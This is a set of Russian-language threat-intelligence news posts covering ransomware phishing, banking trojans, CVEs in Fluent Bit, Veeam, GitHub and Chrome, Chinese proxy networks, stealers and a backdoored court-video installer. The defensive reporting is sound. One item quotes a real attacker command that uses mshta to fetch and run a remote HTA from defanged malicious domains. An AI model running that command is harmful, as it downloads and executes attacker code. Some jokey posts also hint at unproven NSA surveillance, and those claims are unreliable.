͏Исследователи F.A.C.C.T. сообщили о новой волне атак с вредоносными рассылками со стороны Werewolves, специализирующейся на вымогательстве с помощью версии программы-вымогателя LockBit3 (Black), собранной на основе утекшего билдера.

Банда практикует технику двойного давления на жертву: кроме вымогательства за расшифровку данных, злоумышленники выкладывают на сайте информацию о тех, кто отказался платить выкуп, сумма которого обычно составляет 130 000 - 1 000 000$.

Ранее в апреле этого года вымогатели засветили, осуществляя массовые рассылки на тему весеннего призыва и досудебных претензий.

Целями новых атак стали российские промышленные предприятия, телекоммуникационные и IT-компании, финансовые и страховые организации.

Злоумышленники создали фейковый сайт крупного российского производителя спецтехники, полностью эмулировав содержимое оригинального портала с помощью HTTrack Website Copier. Отличие заключалось лишь в доменном имени: у оригинального - com, у фейка - ru.

Письма с темами «Досудебная претензия» и «Рекламация» содержали вредоносные вложения, загружающие Cobalt Strike Beacon.

После того, как жертва открывает вложенный документ «Рекламация.doc» загружается RTF-документ, эксплуатирующий уязвимость CVE-2017-11882.

На устройство жертвы доставляется HTA (HTML Application): mshta https://iplis[.]ru/laydowngrenade.jpeg -> hxxp://vlasta-s[.]ru/logista.hta.

HTA-файл выполняет powershell-команду, в результате которой распаковывается и запускается шелл-код Cobalt Strike Stager, который загружает Сobalt Strike Beacon, конфигурация которого содержит watermark: 987654321 и C&C: poopy[.]aarkhipov[.]ru.

Исследователи IBM сообщают о возвращении вредоносного ПО Grandoreiro после того, как пять разработчиков были задержаны в результате силовой операции в Бразилии в начале прошлого года.

Замеченный в 2017 году Grandoreiro таргетирвоался на испаноязычные страны и привело к хищениям в размере 120 миллионов долларов.

Вернувшийся Grandoreiro теперь задействован в крупномасштабной фишинговой кампании с марта 2024 года, вероятно, в рамках модели MaaS и нацелен на более чем в 60 стран и порядка 1500 банков.

Сам троян подвергся технической модернизации, в результате которой было добавлено множество новых мощных функций и улучшений, а фишинговые приманки разнообразны специально под конкретных жертв.

В электронных письмах авторы выдают себя за правительственные учреждения из Мексике, Аргентине и Южной Африке, в основном за налоговые службы и федеральные органы по электроэнергетике.

Среди замеченных IBM X-Force улучшений: переработанный алгоритм дешифрования строк с использованием комбинации AES CBC и специального декодера, алгоритма генерации домена (DGA), новые механизмы сохранения и отключения системы безопасности в Microsoft Outlook и рассылки на новые цели.

Кроме того, расширен таргетинг банковских приложений и криптокошельков. Обновленный набора команд теперь включает удаленное управление, загрузку/загрузку файлов, ведение журнала клавиатуры и манипулирование браузером с помощью команд JavaScript.

Еще одна примечательная новая функция - это способность Grandoreiro выполнять детальное профилирование жертв для решения о выполнении на устройстве.

При этом аналитики IBM сообщают, что последняя версия трояна избегает запуска в определенных странах, таких как Россия, Чехия, Нидерланды и Польша, а также на компьютерах с Windows 7 в США, где не активен антивирус.

Таким образом, несмотря на недавние действия правоохранительных органов, Grandoreiro жив и теперь более активен, значительно увеличивая свой таргетинг, а вместе с ним и гонорар своих операторов.

͏Ежегодно спецы из Cyber Threat Intelligence Лаборатории Касперского делятся с инфосек-сообществом результатами глобальных исследований по APT и ransomware, проделывая при этом глубочайшую аналитическую работу и штудируя сотни инцидентов по всему миру и миллионы образцов вредоносного ПО.

В 2024 году в ЛК решили качественно изменить подход и представить серию более целевых отчётов о киберугрозах по конкретным регионам, каждый из которых станет настоящим must have для отраслевых экспертов, аналитиков и ИБ-специалистов всех мастей, включая SOC, Cyber Threat Intelligence, DFIR и Threat Hunting.

Первый из них посвящен анализу ландшафта угроз для России и стран СНГ.

В его основе анализ стратегий злоумышленников при вторжении в различные инфраструктуры с обширной базой по TTPs, описанных в рамках уникальной методологии Unified Kill Chain.

Проследив за динамикой атак и угроз, исследовали ЛК отмечают активизацию проявлений хактивизма, сопутствующих росту нападений с использованием доступного инструментария и безотносительно отраслевой принадлежности.

Не снижают своей значимости угрозы, исходящие от APT-групп и банд вымогателей, активность которых продолжает оставаться актуальной для изучаемого региона.

И при всем при этом, традиционно наблюдается давняя тенденция, связанная с таргетингом злоумышленников на наиболее доступные объекты с низким уровнем кибербезопасности.

В целом, основная цель исследования, на наш взгляд, реализована.

Разработанный ЛК материал определенно стоит рассматривать в качестве боевого руководства для разработки наиболее эффективных подходов по предотвращению и реагированию на киберугрозы.

Так что настоятельно рекомендуем ознакомиться с Полной версией отчета «Ландшафт угроз для России и СНГ в 2024 году» (PDF).

Исследователи Tenable сообщают о критической уязвимости в Fluent Bit, которая затрагивает практически всех крупных облачных провайдеров.

Fluent Bit - это чрезвычайно популярное решение ведения журналов и метрик для Windows, Linux и macOS, встроенное в основные дистрибутивы Kubernetes, в том числе от Amazon AWS, Google GCP и Microsoft Azure.

Согласно статистике по состоянию на март 2024, Fluent Bit был загружен и развернут более 13 миллиардов раз и использует в числе прочих инфосек-вендорами Crowdstrike и Trend Micro, а также крупными технологическими компаниями, включая Cisco, VMware, Intel, Adobe и Dell.

Получившая название Linguistic Lumberjack и отслеживаемая как CVE-2024-4323, критическая уязвимость повреждения памяти появилась в версии 2.0.7 и обусловлена проблемой переполнения буфера кучи при анализе запросов трассировки встроенным HTTP-сервером Fluent Bit.

Помимо того, что неаутентифицированные злоумышленники могут легко воспользоваться уязвимостью безопасности для вызова DoS или удаленного захвата конфиденциальной информации, также ее можно задействовать для RCE (при наличии определенных условий и достаточного времени для создания эксплойта).

Учитывая последнее, исследователи полагают, что основные непосредственные риски связаны с возможностью доступной реализации DoS и утечки информации.

Tenable уведомила поставщика об ошибке 30 апреля, а исправления были внесены в основную ветку Fluent Bit уже 15 мая. Ожидается, что официальные выпуски с патчем будут поставляться с Fluent Bit 3.0.4 (пакеты Linux доступны здесь). Кроме того, проинформировали Microsoft, Amazon и Google.

В отсутствие исправлений для всех затронутых платформ клиентам следует смягчить проблему, ограничив доступ к API мониторинга Fluent Bit авторизованным пользователям и службам. Либо вовсе отключить уязвимую конечную точку API.

Если не видно разницы, то зачем платить больше, или зачем вообще платить.

Именно этим принципом теперь руководствуются студенты Калифорнийского университета в Санта-Крус, обращаясь к услугам местной прачечной.

Все дело в том, что двое из них Александр Шербрук и Яков Тараненко обнаружили уязвимость, затрагивающую более миллиона подключенных к Интернету стиральных машин CSC ServiceWorks, которые используются в жилых домах и кампусах колледжей по всему миру.

Удаленный злоумышленник может воспользоваться этой уязвимостью для отправки специально созданных команд на стиральные машины и запуска циклов стирки вещей абсолютно бесплатно.

Обнаружить недостатки Шербрука побудил нулевой баланс его карты в совокупности с кучей несобранных вещей. Поколдовав с командами, студент разработал сценарии, запустив который смог активировать стиралку на запуск цикла.

Затем студенты также смогли пополнить свой виртуальный счет в прачечной на несколько миллионов долларов, доступный через мобильное приложение CSC Go с проблемным API.

Как выяснилось, в приложении отсутствуют проверки безопасности и взаимная аутентификация между приложением и серверами CSC, на которые также тможно отправлять команды, недоступные через само приложение. 

Несмотря на предпринятые попытки связаться с CSC студентам так и не удалось, в связи с чем о своих выводах они уведомили Координационный центр CERT Университета Карнеги-Меллон.

Тем не менее, CSC обнулил студентам накрученный баланс, но ошибки так и не признал, и, собственно, не исправил.

Так что, действительно: если не видно разницы, зачем платить больше?

͏Не могли не отметить руководство по буткитам Windows, которое подготовил и опубликовал исследователь Артем Баранов.

Статья включает два основных раздела: сборник источников с основными отчетами и докладами по буткитам и сводную инфографику

͏Microsoft релизнула новую функцию ИИ-ноутбуков на Windows 11 под названием Recall, которая по факту позволит вести круглосуточный мониторинг всего, что пользователь делает на своем компьютере благодаря постоянным скринам экрана.

Исследователи уже назвали алгоритм АНБшным, несмотря на все заверения разработчиков относительного локального задействования Recall.

Бурные дискуссии на этот счет уже переполняют X и даже сам Илон Макс не смог не отреагировать, назвав завирусившийся видос с 30 млн.просмотров, где Сатья Наделла рассказывает про плюсы Recall, эпизодом из сериала Черное зеркало.

Тем временем, искушенные пользователи Apple после очередного обновления:

Подведем итоги нашего бесплатного курса "Linux для новичков". Курс был составлен из различных модулей, предназначенных для ознакомления с основными аспектами работы в операционной системе Linux.

В рамках курса были изучены основы работы с файлами и директориями, управление пользователями и группами, сетевые возможности Linux, мониторинг, журналирование и проверка безопасности. Также были рассмотрены темы работы с данными и дисками в Linux, туннелирование трафика и полезные инструменты для взлома.

Неделя 1: Введение в Linux
• Что такое Linux и почему его выбирают?
• Основные дистрибутивы Linux: Ubuntu, Fedora, CentOS и др.
• Установка Linux: дуализм с Windows, LiveCD и виртуальные машины.
• Основные команды командной строки Linux: cd, ls, mkdir, rm и др.
• Структура файловой системы Linux: /bin, /etc, /home и др.
• Пакетный менеджер APT для установки и обновления программ.
• Основы текстового редактора nano: открытие, редактирование и сохранение файлов.

Неделя 2: Работа с файлами и директориями
• Основные команды для работы с файлами и директориями: cp, mv, rm и др.
• Работа с архивами в Linux: создание, разархивирование, просмотр.
• Поиск файлов и содержимого в Linux: команды find и grep.
• Управление правами доступа к файлам и директориям в Linux: chmod и chown.
• Символьные и жесткие ссылки: создание и использование.
• Управление процессами и задачами в Linux: команды ps, top, kill и др.
• Автоматическое выполнение задач с помощью cron.

Неделя 3: Управление пользователями и группами
• Создание и удаление пользователей в Linux: команды useradd и userdel.
• Управление паролями пользователей: команда passwd.
• Назначение пользователей в группы: команда usermod.
• Создание и удаление групп в Linux: команды groupadd и groupdel.
• Управление правами доступа к файлам и директориям для пользователей и групп.
• Просмотр информации о пользователях и группах: команды id, whoami и др.
• Ограничение доступа пользователей к определенным ресурсам: команды chroot и sudo.

Неделя 4: Сетевые возможности Linux
• Конфигурация сети в Linux: настройка IP-адреса, маски подсети, шлюза.
• Проверка сетевого подключения: команда ping.
• Конфигурация сетевых интерфейсов: команды ifconfig и ip.
• Работа с удаленными хостами через SSH: подключение, передача файлов.
• Конфигурация DNS-сервера в Linux: файл /etc/resolv.conf.
• Настройка файрвола в Linux: команда iptables.
• Основы настройки и использования сетевых служб в Linux: FTP, Samba и др.
• Основы настройки и использования сетевых служб в Linux: Apache.

Неделя 5: Мониторинг, журналирование, проверка безопасности.
• Лог файлы системы Linux
• Как настроить центральный сервер ведения логов с помощью Rsyslog в Linux.
• Анализ лог-файлов: команды grep, awk, sed.
• Настройка системы мониторинга и аудита: утилиты auditd, nmon.
• Система мониторинга Zabbix
• Мониторинг сети с помощью tcpdump
• Проверка безопасности системы с помощью LinPEAS

Неделя 6: Работа с данными и дисками в Linux
• Использование утилиты rsync для синхронизации данных.
• Основы языка сценариев Bash: переменные, условия, циклы.
• Создание и выполнение сценариев Bash: утилита bash.
• Работа с образами дисков: команды dd, ddrescue.
• Восстановление данных с помощью LiveCD.
• Создание и настройка RAID-массивов для защиты данных.
• Дефрагментация диска Linux

Неделя7: Туннелирование трафика
• Установка и настройка OpenVPN сервера на Ubuntu
• Простая настройка WireGuard Linux.
• Настройка Shadowsocks.
• Pivoting: Chisel
• SSH туннели
• Проксирование трафика с помощью proxychains
• Pivoting: Lugolo-ng

Неделя 8: Полезные инструменты для взлома
• nmap 1 часть
• nmap 2 часть
• nmap 3 часть
• crackmapexec
• metasploit
• Burp Suite
• sqlmap

Не забывайте сохранить и поделиться нашим бесплатным курсом "Linux для новичков"!

#Linux #обучениеlinux #статьипоLinux

LH | Новости | Курсы | Мемы

Поставщик решений для резервного копирования Veeam предупредила клиентов о критической уязвимость Backup Enterprise Manager, которая позволяет неаутентифицированным злоумышленникам авторизоваться в веб-интерфейсе VBEM от имени любого пользователя.

Проблема отслеживается CVE-2024-29849 и имеет оценку CVSS 9,8/10. Однако не все среды подвержены атакам, поскольку VBEM не включен по умолчанию.

Уязвимость исправлена с выпуском версии VBEM 12.1.2.172, однако администратором до выполнения обновления следует смягчить недостаток, отключив службы VeeamEnterpriseManagerSvc (Veeam Backup Enterprise Manager) и VeeamRESTSvc (Veeam RESTful API).

Кроме того, Veeam исправила еще две высокосерьёзные уязвимости VBEM: CVE-2024-29850 и CVE-2024-29851.

Первая позволяет перехватывать учетные записи через ретранслятор NTLM, а другая позволяет пользователям с высокими привилегиями похитить NTLM-хэш учетной записи службы Veeam Backup Enterprise Manager.

Засекаем таймер и ждем, когда вновь выявленные недостатки будут использованы для взлома хостов инфраструктуры резервного копирования, как это было в марте 2023 года, когда статусы клиентов Veeam навестили вымогатели.

Но будем посмотреть.

͏Команда ученых из Университета Цинхуа в Пекине обнаружила новый метод запуска широкомасштабных DDoS-атак с использованием DNS-трафика.

Новая атака называется получила название DNSBomb и представляет собой вариант DDoS-атаки формата 2003 года с использованием TCP-импульсов.

Новая атака использует ту же концепцию, но повторно реализует ее с использованием программного обеспечения DNS и современной инфраструктуры DNS-серверов.

Если простыми словами, DNSBomb работает, отправляя медленный поток измененных DNS-запросов на DNS-серверы, которые пересылают данные, увеличивая размер пакета и удерживая его, чтобы затем выпулить все сразу в импульсе DNS-трафика прямо на цель.

DNSBomb присвоен CVE-2024-33655, а исследование с подробными техническими деталями по ней будет представлено на этой неделе на симпозиуме IEEE по безопасности и конфиденциальности в Сан-Франциско.

Исследовательская группа утверждает, что протестировала свою технику на 10 основных программах DNS и 46 общедоступных службах DNS и смогла запустить DNSBomb со скоростью до 8,7 Гбит/с, при этом DNS-трафик был увеличен до 20 000 от первоначального размера.

Подобные цифры в реализации DNSBomb помимо исследователей заинтересовали также разработчиков ботнетов и операторов услуг по DDoS.

Правда, исследователи сообщили об атаке всем пострадавшим сторонам, при этом 24 организации уже подтвердили результаты исследования и выпустили соответствующие исправления.

͏Ведущий ICS-производитель Rockwell Automation неожиданно обратилась к клиентам с требованием «НЕМЕДЛЕННО» отрубить от сети свои устройства ICS.

В качестве объяснения для своих предупреждений компания сослась на усиление вредоносной киберактивности в отношении КИИ на фоне нарастания геополитической напряженности.

Поставщик призвал как можно скорее изолировать те устройства ICS, прямо не предназначенные для общедоступного подключения к Интернет, что гарантирует компрометации тех из них, которые возможно, еще не исправлены от уязвимостей. Правда, каких именно в уведомлении поставщика не сообщается.

Rockwell также отметила о необходимости принятия мер по смягчению для защиты устройств от следующих уязвимостей: CVE-2021-22681, CVE-2022-1159, CVE-2023-3595, CVE-2023-46290, CVE-2024-21914, CVE-2024-21915 и CVE-2024-21917.

Даже CISA репостнула у себя сообщение Rockwell Automation в отношении отключения устройств ICS.

Видимо, что-то знают, но молчат.

После шквала мемов, сопровождающих скандал по поводу конфиденциальности пользовательских данных в яблочных девайсах, Apple решила экстренно выпустить iOS 17.5.1.

Обнаруженный баг был вызван тем, что фотографии удалялись из приложения Photos, но не из файлового менеджера, а после обновления до iOS 17.5 удаленные таким образом фото вновь появились в ленте медиатеки.

Похоже, что баг был связан с процессом переиндексации после обновления iOS, при котором система по ошибке пересохранила фотографии из файлового менеджера в приложении Photos.

Тем не менее, англоязычные владельцы сразу же преуспели в конспирологию и начали муссировать слухи про негласные договоренности Apple со спецслужбами по поводу "mirroring" данных и изображений.

Конечно, никаких доказательств никто так и нашел, но неприятный осадочек остался.

͏Тем временем Apple делится «удаленными» фотографиями пользователей с кураторами из АНБ.

GitHub выпустила исправления для критической уязвимости в Enterprise Server, которая позволяет неаутентифицированным злоумышленникам получить административные привилегии.

CVE-2024-4985 имеет максимальную оценку из возможных CVSS 10/10 и затрагивает все версии Enterprise Server до 3.13.0 с аутентификацией единого входа SAML (SSO) и включенной дополнительной функцией зашифрованных утверждений.

Эксплуатация открывает несанкционированный доступ к серверу с правами администратора без необходимости предварительной аутентификации с помощью подделки ответа SAML.

Однако, согласно GitHub, поскольку зашифрованные утверждения не включены по умолчанию, экземпляры, использующие аутентификацию SAML SSO без этой функции, не подвержены недостатку, как Enterprise Server без единого входа SAML.

GitHub исправила уязвимость, выпустив в срочном порядке версии Enterprise Server 3.9.15, 3.10.12, 3.11.10 и 3.12.4.

Разработчик не располагает сведениями об эксплуатации уязвимости в дикой природе, но с учетом серьезности CVE-2024-4985, пользователям рекомендуется как можно скорее обновить GitHub Enterprise Server до исправленной версии.

Поскольку максимальный уровень серьезности CVE-2024-4985 подвергает пользователей непропатченных версий невероятно высокому риску взлома сети злоумышленниками.

Исследователи Cybernews предупреждают о новой атаке на цепочку мудаков, обнаружив в сети 224 962 вероятно уязвимых экземпляров Atlassian Confluence Data Center и Confluence Server.

Традиционно больше всего (мудаков) их оказалось в США (53 195) и Японии (22 007), но и во Франции (11 562) и Германии (11 373) - тоже имеются.

По мнению исследователей, все они подвергаются потенциальному воздействию недавно обнаруженной критической уязвимости, которая отслеживается как CVE-2024-21683 и имеет оценку CVSS 8,3.

Она позволяет злоумышленнику, прошедшему проверку подлинности, выполнить произвольный код и не требует взаимодействия с пользователем, а скомпрометированная система при этом может быть использована в качестве опорной точки для продвижения внутри сети.

Ошибка в Atlassian Confluence Data Center и Confluence Server была исправлена, но несмотря на это исправить дефекты серого вещества владельцам обнаруженных сотен тысяч экземпляров пока не удалось.

По всей видимости, в самое ближайшее время этим займутся банды вымогателей и APT, правда за лечение придется заплатить.

Исследователи Mandiant поделились своими соображениями относительно того, как APT для уклонения от обнаружения задействуют прокси-сети, или сети оперативной ретрансляции ORB, созданные по типу ботнета из коммерческих VPS-сервисов и взломанных устройств.

Независимо от типа используемых устройств, сеть ORB включает обязательный набор необходимых компонентов:
- сервер администрирования узлов ACOS,
- узел ретрансляции (позволяет аутентифицироваться в сети и ретранслировать трафик),
- узлы обхода (основные узлы в сети ORB),
- выходные/промежуточные узлы (для запуска атак на цели),
- сервер-жертва (инфраструктура жертвы, взаимодействующая с узлом в сети ORB).

По данным ресерчеров, все чаще к ORB обращаются именно китайские APT в реализации своих операций кибершпионажа, две из которых им удалось задетектить.

Один из отлеживаемых кластеров прокси - ORB3/SPACEHOP, описывается как очень активная сеть, используемая множеством злоумышленников, связанных с Китаем, включая APT5 и APT15 для разведки и эксплуатации уязвимостей.

В декабре 2022 года SPACEHOP задействовалась для  эксплуатации критической CVE-2022-27518 в Citrix ADC, которую АНБ связало с APT5 (Manganese, Mulberry Typhoon, Bronze Fleetwood, Keyhole Panda, и UNC2630).

По данным Mandiant, SPACEHOP - это высокоорганизованная сеть, использующая сервер ретрансляции в Гонконге или Китае у облачного провайдера и поддерживающая структуру C2 с открытым исходным кодом для управления нижестоящими узлами.

Узлы ретрансляции представляют собой клонированные образы на базе Linux, выполняющие роль перенаправления вредоносного трафика на выходной узел, который взаимодействует с целевыми средами жертвы.

Другая ORB2/FLORAHOX представляет собой гибридную сеть, состоящую из сервера ACOS, скомпрометированных устройств (маршрутизаторов и IoT) и VPS, которые пропускают трафик через TOR и различные типы взломанных маршрутизаторов, включая устройства с EoL CISCO, ASUS и Draytek.

Исследователи полагают, что эта сетка используется в кампаниях кибершпионажа различными участниками угроз, связанных с Китаем, чтобы скрыть трафик от источника.

Судя по всему, сеть содержит несколько подсетей, состоящих из взломанных устройств, задействованных имплантатом маршрутизатора FLOWERWATER, а также других полезных нагрузок на базе маршрутизатора.

Несмотря на то, что ORB2/FLORAHOX используется многими злоумышленниками, Mandiant полагает, что за ней может стоять APT31/Zirconium.

Помимо FLOWERWATER для навигации по сети ORB2 и ранее существовавшим узлам на основе входных данных командной строки задействовались также и дополнительные полезные данные и инструменты, в том числе туннелер маршрутизатора MIPS PETALTOWER, сценарии bash SHIMMERPICK.

В целом ресерчеры резюмировали, что подобная практика с ORB достаточно усложняет решение задач по защите корпоративной среды, негативно влияя, прежде всего, на обнаружение и атрибуцию, а также размывая индикаторы атакующей инфраструктуры.

Лаборатория Касперского продолжает отслеживать и разбирать все новые версии различных стилеров, которые по-прежнему представляют актуальную угрозу и пользуются повышенным спросом в киберподполье.

Стилеры опасны своими последствиями, обеспечивая злоумышленников необходимой конфиденциальной информацией для задействования в других вредоносных целях, приводя по итогу к ощутимым финансовым потерям.

В новом отчете специалисты разобрали усовершенствованный вариант уже известной Sys01, а также два совершенно новых стилера - Acrid и ScarletStealer с различной сложностью и функциональностью.

Acrid - это новый стилер, обнаруженный в декабре прошлого года. Написан на C++ для 32-разрядных систем.

При этом компиляция для 32-разрядной среды, вероятно, обусловлена техникой Heaven’s Gate, которая позволяет 32-разрядным приложениям получать доступ к 64-разрядной среде, чтобы обойти определенные меры безопасности.

Функциональность стилера типична для вредоносного ПО такого типа, собранные данные архивируются и отправляются на командный сервер злоумышленников.

Уровень сложности стилера - средний, в нем есть некоторые изощренные детали, вроде шифрования строк, но нет ничего инновационного.

ScarletStealer, напротив, довольно необычный стилер. Большая часть его функциональности содержится в других бинарных файлах (приложениях и расширениях Chrome), которые он загружает.

При этом стилер очень слабо развит в плане функциональности и содержит множество ошибок, недоработок и избыточного кода. В связи с чем довольно странно, что этот стилер распространяется через длинную цепочку загрузчиков (последний из которых — это Penguish) и подписан цифровым сертификатом.

Его жертвы в основном находятся в Бразилии, Турции, Индонезии, Алжире, Египте, Индии, Вьетнаме, США, Южной Африке и Португалии.

И, наконец, SYS01 (Album Stealer, S1deload Stealer) - относительно малоизвестный стилер, существующий как минимум с 2022 года и попадавший в поле зрения Bitdefender, Zscaler и Morphisec. Он эволюционировал с C# до стилера на PHP, а ЛК заметили сочетание двух полезных нагрузок - на C# и на PHP.

Единственное, что не изменилось в новой версии стилера, - это вектор заражения. Как и раньше, пользователей обманом побуждают загрузить вредоносный ZIP-архив, замаскированный под видео для взрослых, через страницу на Facebook.

Открытие приводит к запуску полезной нагрузки, которая представляет собой вредоносный PHP-файл, закодированный с помощью ionCube. Он вызывает скрипт install.bat, а тот выполняет команду PowerShell для запуска runalayer и финальной полезной нагрузки Newb.

Последняя версия содержит функциональность для кражи данных, связанных с Facebook и из браузера, а также реализует функции бэкдора.

Жертвы наблюдаемой кампании - по всему миру, но большинство - в Алжире (чуть более 15%).

Индикаторы компрометации - в отчете Лаборатории Касперского.

Если ситуацию с восставшими из пепла фотографиями после обновления до iOS 17.5 благодаря Synactiv в итоге удалось разрулить, отбросив сомнения по поводу проблем с iCloud (правда, все же остается непонятным зачем фото хранятся в памяти телефона после их удаления), то совсем недавно назрела новая дилемма.

Исследователи из Университета Мэриленда выявили серьёзные проблемы с безопасностью данных в системах геолокации Apple, которые к тому же затрагивают и Starlink.

Как оказалось, Apple собирает информацию о Wi-Fi точках доступа (BSSID), видимых её устройствами, что позволяет определять местоположение без постоянного использования GPS. Аналогичные системы кстати работают и в Google.

В отличие от Google, система позиционирования Wi-Fi Apple (WPS) способна возвращает геолокацию до 400 близлежащих BSSID по запросу через официальный API.

Ученые полагают, что эти данные можно собирать для создания полномасштабной карты устройств с поддержкой Wi-Fi по всему миру, включая устройства сторонних производителей.

При этом периодические обновления массивов позволят отслеживать перемещение конкретных лиц и групп в течение определенного периода времени.

Ученые запросили информацию о более чем миллиарде случайно сгенерированных BSSID и получили данные о 488 миллионах точек доступа. Причем им удалось точно отследить и перемещение терминалов Starlink в зоне проведения СВО, а также перемещения беженцев на юг Сектора Газа в ходе израильско-палестинского конфликта.

В ответ на результаты исследования, Starlink выпустила обновления ПО, которые рандомизируют BSSID устройств, что затрудняет их отслеживание. Исследователи отметили, что в последние месяцы количество устройств Starlink, местоположение которых можно было бы определять с помощью системы Apple, действительно снизилось.

Apple также отреагировала на исследование и внесла изменения в свою политику конфиденциальности, а в марте 2024 года позволила пользователям исключать свои Wi-Fi точки доступа из системы, добавив суффикс «_nomap» к имени сети.

Однако, по мнению исследователей, Apple следует все же внедрить дополнительные меры для ограничения злоупотреблений своим API, например, ограничение скорости запросов.

Так что, вопросов (больше - риторических) к Apple становится все больше.

Такими темпами Google «пятилетку за год» осилит, если продолжит в неделю по 0-day закрывать.

Восьмой активно эксплуатируемый ноль за текущий год исправила Google в браузере Chrome, выпустив экстренное обновление безопасности.

Проблема была обнаружена ресерчером Google Клеманом Лесинем и отслеживается как CVE-2024-5274. Она представляет собой серьезную путаницу типов в V8, движке JavaScript Chrome, которая может привести к сбоям, повреждению данных, а также RCE.

Google не поделилась техническими подробностями об уязвимости, но заявляет о своей осведомленности в наличии рабочего эксплойта для CVE-2024-5274 и попытках ее эксплуатации в дикой природе.

Исправления Chrome доступны в качестве версии 125.0.6422.112/.113 для Windows и Mac, а пользователи Linux получат обновления для версии 125.0.6422.112 в ближайшие недели.

Исследователи кибербезопасности из Rapid7 и S2W обнаружили троян-бэкдор GateDoor в популярном приложении Justice AV Solutions (JAVS) для просмотра записей заседаний, используемого в судебных, исправительных и юридических учреждениях по всему миру.

Неизвестные злоумышленники реализовали атаку на цепочку поставок, внедрив вредоносное ПО в установщик JAVS Viewer версии 8.3.7, который имеет более 10 000 загрузок.

Модификация официального установщика с внедрением в его вредоносного двоичного fffmpeg.exe, вероятно, была произведена в апреле и затронула клиентов, воспользовавшихся им до середины мая.

Расследовавшая этот инцидент в цепочке поставок (теперь отслеживается как CVE-2024-4978) Rapid7 отмечает, что S2W Talon впервые обнаружила  зараженный установщик JAVS в начале апреля и связала его с вредоносным ПО Rustdoor/GateDoor.

Найденная вредоносная ПО написана на Go и представляет собой версию RustDoor для Windows, бэкдора на основе Rust, который может заражать системы macOS.

Предыдущие отчеты Bitdefender и S2W связывали обе версии вредоносного ПО с серверной инфраструктурой, которой ранее управляла соскамившаяся банда вымогателей AlphV (BlackCat).

Анализируя инцидент, связанный с CVE-2024-4978, произошедший 10 мая, Rapid7 обнаружила, что вредоносное ПО отправляет системную информацию на свой C2 после установки и запуска.

Затем выполняет два запутанных сценария PowerShell для отключения отслеживания событий для Windows (ETW) и обхода интерфейса сканирования на наличие вредоносных программ AMSI.

Затем дополнительная вредоносная нагрузка с сервера C2 сбрасывает сценарии Python, которые начинают собирать учетные данные из браузеров в системе.

Rapid7 поделилась рекомендауиями по детектированию угрозы, вредоносной версией приложения JAVS Viewer, настоятельно призывая затронутых клиентов в случае обнаружения выполнить полную переустановку и сменить все пароли в системе.

В свою очередь, Justice AV Solutions, также отреагировала на инцидент, удалив вредоносный установщик со своих серверов и теперь проводит аудит всех программных продуктов JAVS.

Предварительно инцидент локализован, но до сих пор разработчики пытаются выяснить, как злоумышленнику удалось разместить на своих серверах файл с бэкдором.